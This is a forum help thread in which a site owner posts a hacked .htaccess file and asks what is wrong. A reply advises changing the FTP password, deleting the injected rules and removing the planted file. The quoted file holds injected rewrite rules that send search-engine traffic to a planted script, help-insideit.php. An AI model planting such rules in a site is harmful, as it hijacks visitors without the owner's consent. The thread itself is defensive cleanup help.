: Solving corruption in a .htaccess flle I received a call from Go Daddy indicating that my site had been hacked and the .htaccess file is now an issue. The code in my .htaccess file is as
I received a call from Go Daddy indicating that my site had been hacked and the .htaccess file is now an issue.
The code in my .htaccess file is as follows
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /help-insideit.php?p= [L]
AddType application/octet-stream .gdb .gpx
Could someone advise me as to what could be corrupted?
More posts by @BetL925
1 Comments
Sorted by latest first Latest Oldest Best
you need to do a few things to fix the issue.
Change your FTP password, you need a strong password.
Remove the three lines starting with 'RewriteCond' and 'RewriteRule' in your htaccess file.
Delete the file 'help-insideit.php' from your server.
As commented above contact GoDaddy's hosting support department if you need help with it.
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.